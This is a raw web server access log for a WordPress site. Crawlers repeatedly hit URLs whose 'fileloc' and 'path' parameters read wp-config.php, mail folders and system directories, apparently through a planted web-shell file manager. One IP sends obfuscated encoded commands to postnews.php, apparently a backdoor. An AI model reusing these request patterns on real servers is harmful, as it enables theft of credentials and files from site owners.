216.73.216.53 - - [03/Nov/2025:05:52:20 +1000] "GET /763332928?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-links-opml.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 15612 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [03/Nov/2025:05:49:29 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131363536392p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323131323936392q3362633936393063373434306532663531363736363138356137613135356331222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [03/Nov/2025:05:52:23 +1000] "GET /763908112?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-config.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 16381 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:52:25 +1000] "GET /1420432?path=//usr/lib HTTP/1.0" 200 57609 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:52:26 +1000] "GET /763908112?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fxmlrpc.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 16420 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:52:29 +1000] "GET /763335648?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-config.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 16381 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:52:32 +1000] "GET /1041472?path=//etc/skel HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:52:32 +1000] "GET /763988464?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fxmlrpc.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 16420 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:52:35 +1000] "GET /763858048?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fdelpaths.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 12802 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:52:38 +1000] "GET /763907232?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-config.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 16381 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:52:39 +1000] "GET /1250976?path=//usr/etc HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:05:49:52 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131363539322p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323131323939322q6335376562336161326132303162623864616630613633613732613230623637222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [03/Nov/2025:05:52:44 +1000] "GET /763907232?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fxmlrpc.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 16420 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:52:47 +1000] "GET /1149728?path=//etc/xdg HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:52:47 +1000] "GET /763362640?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww HTTP/1.0" 200 17137 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:52:50 +1000] "GET /763335648?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fxmlrpc.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 16420 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.38.147.165 - - [03/Nov/2025:05:52:52 +1000] "GET /1497718944?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/postnews.php&path=/home/region-gk.ru/data/www/new.region-gk.ru HTTP/1.0" 200 18733 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.53 - - [03/Nov/2025:05:52:53 +1000] "GET /764063088?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-links-opml.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 15612 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:52:54 +1000] "GET /1304048?path=//etc/mail HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:52:56 +1000] "GET /763842240?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-blog-header.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 13092 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:52:59 +1000] "GET /763657072?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Finputs.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 12750 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:53:01 +1000] "GET /1357648?path=//var/nis HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:53:02 +1000] "GET /763657072?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-activate.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 21576 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:53:05 +1000] "GET /763798016?path=%2Fhome HTTP/1.0" 200 99139 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:53:07 +1000] "GET /1016624?path=//etc/xdg HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:05:50:15 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131363631352p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323131333031352q6165643534373965633139303863383337303035326164393832336165656333222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [03/Nov/2025:05:53:08 +1000] "GET /763868064?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fdelpaths.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 12802 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:53:11 +1000] "GET /763651856?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-includes HTTP/1.0" 200 458675 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:53:14 +1000] "GET /1297280?path=//usr/etc HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:53:14 +1000] "GET /763901472?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww HTTP/1.0" 200 17137 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:53:17 +1000] "GET /763617056?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-trackback.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 18551 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:53:20 +1000] "GET /763786512?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww HTTP/1.0" 200 17137 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:53:23 +1000] "GET /1400736?path=//var/mail HTTP/1.0" 200 95631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:53:23 +1000] "GET /763383504?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-links-opml.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 15612 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:53:26 +1000] "GET /763310240?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-config-sample.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 16271 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:53:29 +1000] "GET /763868064?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-config.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 16381 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:53:30 +1000] "GET /1298832?path=//var/lib HTTP/1.0" 200 59851 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:05:50:40 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131363634302p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323131333034302q6462313961646262363439636466656230396235663239333961373238613066222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [03/Nov/2025:05:53:32 +1000] "GET /763783760?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-config-sample.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 16271 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:53:35 +1000] "GET /763657072?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-trackback.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 18551 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:53:36 +1000] "GET /1516864?path=//etc/mail HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:53:38 +1000] "GET /763868064?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fxmlrpc.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 16420 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:53:41 +1000] "GET /763868064?path=%2Fhome HTTP/1.0" 200 99139 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:53:44 +1000] "GET /763310240?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fwp-cron.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 18510 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:53:44 +1000] "GET /1164336?path=//usr/lib HTTP/1.0" 200 57609 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:53:47 +1000] "GET /763858048?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fxmlrpc.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 16420 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:53:52 +1000] "GET /1042736?path=//etc/pki HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:53:52 +1000] "GET /1110848112?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fpostnews.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 18733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [03/Nov/2025:05:51:03 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131363636332p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323131333036332q6238306333366634346464333633313465656631356338356237643430383366222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [03/Nov/2025:05:53:55 +1000] "GET /1111332960?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2FALFA_DATA HTTP/1.0" 200 17518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:53:56 +1000] "GET /1461104?path=//usr/lib HTTP/1.0" 200 57609 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:53:58 +1000] "GET /1111084544?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2FALFA_DATA HTTP/1.0" 200 17518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:54:01 +1000] "GET /1110921728?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fpostnews.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 18733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:54:04 +1000] "GET /1208560?path=//var/nis HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:54:04 +1000] "GET /1111211360?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fpostnews.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 18733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:54:07 +1000] "GET /1110879312?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fyrhaeltb.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 31631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:54:10 +1000] "GET /1111345856?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fpostnews.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 18733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:54:12 +1000] "GET /1194832?path=//run/dbus HTTP/1.0" 200 12721 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:54:13 +1000] "GET /1110997024?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fisdnezmf.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 39508 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.38.147.170 - - [03/Nov/2025:05:54:14 +1000] "GET /1497718944?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/delpaths.php&path=/home/region-gk.ru/data/www/new.region-gk.ru HTTP/1.0" 200 12802 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
212.16.195.25 - - [03/Nov/2025:05:51:26 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131363638362p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323131333038362q6530663333616132303237643962636239356663666662653331336436326162222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
198.98.53.242 - - [03/Nov/2025:05:54:19 +1000] "GET /wp-login.php HTTP/1.0" 200 60472 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0"
216.73.216.53 - - [03/Nov/2025:05:54:19 +1000] "GET /1111009920?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fpostnews.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 18733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:54:22 +1000] "GET /1496512?path=//etc/mail HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
114.119.156.46 - - [03/Nov/2025:05:54:22 +1000] "GET /2439117632?path=/home/region-gk.ru/data/www/new.region-gk.ru HTTP/1.0" 200 60472 "https://region-logist.ru/2439117632?shopdetail=2436242163" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.53 - - [03/Nov/2025:05:54:22 +1000] "GET /1111471216?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fyrhaeltb.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 31631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:54:25 +1000] "GET /1111259216?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fpostnews.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 18733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:54:28 +1000] "GET /1111016688?path=%2Fhome%2Fregion-gk.ru HTTP/1.0" 200 14069 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:54:30 +1000] "GET /1400736?fileloc=//var/mail/neptunvld.com&path=//var/mail HTTP/1.0" 200 12316 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:54:31 +1000] "GET /1110969712?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fpostnews.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 18733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:54:34 +1000] "GET /1111322496?fileloc=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2Fisdnezmf.php&path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru HTTP/1.0" 200 39508 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:05:54:36 +1000] "GET /1413792?path=//lib/kbd HTTP/1.0" 200 17991 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:05:54:37 +1000] "GET /1111504464?path=%2Fhome%2Fregion-gk.ru%2Fdata%2Fwww%2Fnew.region-gk.ru%2FALFA_DATA HTTP/1.0" 200 17518 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:05:54:40 +1000] "GET /1111549104?path=%2Fhome%2Fregion-gk.ru%2Fdata HTTP/1.0" 200 28013 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [03/Nov/2025:05:51:49 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131363730392p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323131333130392q6166613030616366366130656436306332393739373232336435663237313065222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
